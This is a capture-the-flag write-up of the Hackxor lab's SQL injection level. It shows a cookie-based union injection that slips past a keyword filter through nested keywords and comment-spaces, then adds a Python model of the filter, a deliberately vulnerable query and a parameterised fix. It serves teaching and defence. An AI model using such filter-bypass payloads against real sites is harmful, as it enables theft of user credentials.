Hackxor SQL Injection

You can download the complete challenge VM from here. They have also provided an online version of the first two levels, which is what I had a look at: http://cloaknet.csc.kth.se:8080/proxy.jsp

There is a login page and our goal is to extract all the usernames and passwords from the database.

If you try injecting the login form, none of the injections work. But there is a link labelled “No account?”; clicking it shows this message.

After logging in with demo:demo we are taken to “proxypanel.jsp”, which displays source, target and date.



Let’s analyze this using Burp. The login itself is a POST request. Notice that it is made to the “proxy.jsp” page:

user=demo&pass=demo&login=1
&token=17312256995467290477108424856116888064446348101932685808552243140
&asd=Login

Too bad, the web app uses a login token, which means we cannot simply replay this request to experiment with it.

After forwarding the request, a second request, a GET to “proxypanel.jsp”, fetches the page we actually land on. This is where the cookie values are sent.

Let’s have a look at the cookies.

There are two cookies, JSESSIONID and userid. Let’s mutate the userid value and check the output: userid=71934"\\;

Aha!

com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near '''''' at line 1

After counting the columns I got 3. You cannot simply inject here, because there is a filter: from what I noticed, the keywords union and select, as well as spaces, are removed. To get around the space filter I used /**/ comments, and to get around the keyword filter I nested each keyword inside itself, UNunionION and SELselectECT, so that once the filter strips the inner occurrence the outer one is left intact. However, when I tried selecting 1,2,3 I still got the error “The used SELECT statements have a different number of columns”.

Our target is to dump the usernames and passwords. The userid cookie must be a column in some other table, presumably the one holding the accounts, so I guessed it is called “users” and tried this query, selecting * from it so the column count is whatever that table has:

-71934/**/unUNIONion/**/seSELECTlect/**/*/**/from/**/users
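Here is a small model of the pattern described above, as an added example that is not part of the original post and not the challenge's own code: the cookie is run through a blacklist filter and then concatenated into the query, the nested-keyword payload survives the filter while a plain one is mangled, and a bound parameter makes the filter unnecessary. The filter behaviour (each token removed case-insensitively in one pass, with no rescan) and the users table layout (userid, username, password) are assumptions; the challenge runs MySQL, but an in-memory SQLite database is enough to show the mechanics, since both treat /**/ as whitespace. The leading -71934 is a userid that matches no row, so only the UNIONed rows are displayed.

```python
import re
import sqlite3

# Assumed filter: the page says "union", "select" and spaces are stripped.
# Single-pass, case-insensitive removal of each token is our model of it.
BLACKLIST = ("union", "select", " ")

# The cookie value from the page, unchanged, and a plain payload for comparison.
PAYLOAD = "-71934/**/unUNIONion/**/seSELECTlect/**/*/**/from/**/users"
NAIVE_PAYLOAD = "-71934 union select * from users"


def keyword_filter(value: str) -> str:
    """Model of the challenge's blacklist filter (an assumption, not the real code).

    Each token is removed everywhere it occurs, but the string is never rescanned,
    so a keyword that only appears *after* a removal survives intact.
    """
    for token in BLACKLIST:
        value = re.sub(re.escape(token), "", value, flags=re.IGNORECASE)
    return value


def build_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the challenge's MySQL users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userid INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(71934, "demo", "demo"), (1, "admin", "s3cret"), (2, "alice", "hunter2")],
    )
    return conn


def vulnerable_lookup(conn, userid_cookie: str):
    """Filter-then-concatenate, the pattern proxypanel.jsp appears to use.

    Returns the rows, or the database error message when the statement breaks,
    which is the behaviour that leaked the SQL syntax error on the page.
    """
    sql = "SELECT * FROM users WHERE userid = " + keyword_filter(userid_cookie)
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return f"error: {exc}"


def safe_lookup(conn, userid_cookie: str):
    """Bound parameter: the cookie is data, not SQL text, so no blacklist is needed."""
    return conn.execute(
        "SELECT * FROM users WHERE userid = ?", (userid_cookie,)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("filtered nested payload:", keyword_filter(PAYLOAD))
    print("filtered naive payload: ", keyword_filter(NAIVE_PAYLOAD))
    print("vulnerable, naive:      ", vulnerable_lookup(db, NAIVE_PAYLOAD))
    print("vulnerable, nested:     ", vulnerable_lookup(db, PAYLOAD))
    print("parameterised, nested:  ", safe_lookup(db, PAYLOAD))
```

Under this model the plain payload is reduced to `-71934*fromusers`, which is a broken expression rather than a UNION, while the nested payload comes out of the filter as exactly the query the author wanted. The parameterised version returns no rows for the payload because the cookie is compared as a value, not parsed as SQL; that is the fix, not a longer blacklist.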

w00t! Here we go 🙂

Thanks for reading.
